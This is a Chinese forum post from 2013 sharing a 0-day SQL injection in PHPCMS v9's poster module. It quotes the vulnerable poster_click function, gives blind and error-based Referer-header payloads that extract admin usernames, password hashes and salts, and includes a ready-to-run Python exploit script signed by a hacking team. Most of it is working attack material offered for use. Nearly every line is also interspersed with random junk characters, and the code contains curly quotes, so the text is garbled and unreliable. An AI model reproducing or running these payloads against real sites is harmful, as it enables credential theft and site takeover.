有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
9 h1 k! G0 n. ~ n% ]2 ?1 D) j. {3 W' w# ~" a. I. a% s
问题函数\phpcms\modules\poster\index.php
" l) F1 x; E* ?! u+ _- s6 y5 p3 O: e/ X0 s, C! w
public function poster_click() {
; h. Y2 K% i+ Y0 E, D; H$id = isset($_GET['id']) ? intval($_GET['id']) : 0;( F: W5 O) j- s" q
$r = $this->db->get_one(array('id'=>$id));
% S) d2 v# w% uif (!is_array($r) && empty($r)) return false;' @6 f! O9 G8 ]; H: K
$ip_area = pc_base::load_sys_class('ip_area');
% G( E' b- X9 V7 n1 W$ip = ip();
: {* Y( p2 w) A; X% ]$area = $ip_area->get($ip);7 z% H8 Z6 b4 O1 b. J
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
% I4 d! z; M s9 ~9 U. e% nif($id) {+ v; z1 i4 D ?% ]
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();$ v' X2 W) a6 q- s6 q! \
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
6 E4 h$ f: Z T}+ t* k; i1 p# \$ ^) C: ]
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));4 U, q) M1 r: \5 t7 K5 h4 m
$setting = string2array($r['setting']);
' B# [$ O a2 B5 W; yif (count($setting)==1) {% _' u. k: L( h
$url = $setting['1']['linkurl'];4 J, ^- c# r# |, E% R% v5 J
} else {
. h6 h9 B& J4 d) [) j# a/ q, w$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
. O6 P6 j4 E* h& B7 l% U( j}: \7 E4 I N _/ Q0 M
header('Location: '.$url);
, v4 S- c" T U8 F6 i. p& I/ j2 K}
6 K" X; n' K6 u. c9 S3 S' c- p5 b6 d$ b
# R. n( h4 L1 F) ]3 C
# n7 o" }: w5 q% V& B" |利用方式:7 ]1 A }( r6 ^4 C, ~1 o J2 U
! _0 n! W( ^/ m4 o" X) s! n1 i1、可以采用盲注入的手法:
! I$ z( C8 z# L# N' {: G7 K+ i# ]6 s
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
6 o4 i. O% w+ H; z0 v. I- b* Y- |+ _9 W& `0 E# S+ j) |) K% S. b
通过返回页面,正常与否一个个猜解密码字段。
) C/ S- F" p/ T Z8 e# @' u! P9 E8 |% f+ p
2、代码是花开写的,随手附上了:
# x3 i4 K) [$ P1 b$ `
% |' |6 N; p9 R. Q( ]; Q4 t% s1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
+ }3 r' x/ D, U% Z; a* w- Y3 j# V. J& U$ d
此方法是爆错注入手法,原理自查。% C9 o; M; z, z
& i: [. v+ n. ^. F& ?! z" o 6 a; \* A3 j% R8 V5 L; {! z$ ~; o
" S9 ?' R, u% B. p7 x& S# q! e利用程序:
3 p. `1 W# q: Q$ y3 V( L
9 O1 l4 U2 I0 F8 b* w2 Y, u0 A#!/usr/bin/env python
) g! p/ }: J7 X$ Q& _5 U, X: o' F5 yimport httplib,sys,re
& O* q& w% I1 ^( K2 X# y9 c" J# K) L4 V
def attack():: E7 ~7 K L: `5 I
print “Code by Pax.Mac Team conqu3r!”
+ j8 Q0 K8 y8 N# T+ o$ s$ z' xprint “Welcome to our zone!!!”
6 B8 Y9 i& k3 ]# l& ~url=sys.argv[1]
7 y# ^, I8 O# K T; O7 N7 F- T* Zpaths=sys.argv[2]
8 S& X9 M( N8 M9 N4 Aconn = httplib.HTTPConnection(url)
6 L& d' } k* L- oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
$ u7 ?, |( ]: N) {, z. n! f“Accept”: “text/plain”,6 P; r- ^% p5 |4 |: o0 j
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}2 g3 s; k( i% q% l Y! j7 K% h
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)* w4 g; n5 X7 K/ Q9 a- M9 L7 w4 Y
r1 = conn.getresponse(). n2 v8 [" q4 O% j H: g8 W
datas=r1.read()1 N. t N4 z# K$ u
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
( U+ O; R9 Q. iprint datas[0]3 j5 D# k) F) E- @( X8 c6 z
conn.close(); h. `2 y' j* a/ V: ?
if __name__==”__main__”:. i0 f- x, l' T
if len(sys.argv)<3:8 ~, G" l& N8 b* j) `
print “Code by Pax.Mac Team conqu3r”& t0 Y4 D/ n5 j* U T2 c
print “Usgae:”
# z/ y- y7 x) ]4 f( tprint “ phpcmsattack.py www.paxmac.org /”4 F# ^+ n5 |5 y3 J7 X
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
0 k1 L# `: \$ Asys.exit(1)
- r n: v/ g, u' G& Lattack()9 n3 P& T' T& V& W$ I$ u
- v5 G$ o9 R+ l5 V% B* o- ]
|
发表于 2013-1-11 21:01:00
收藏
支持
反对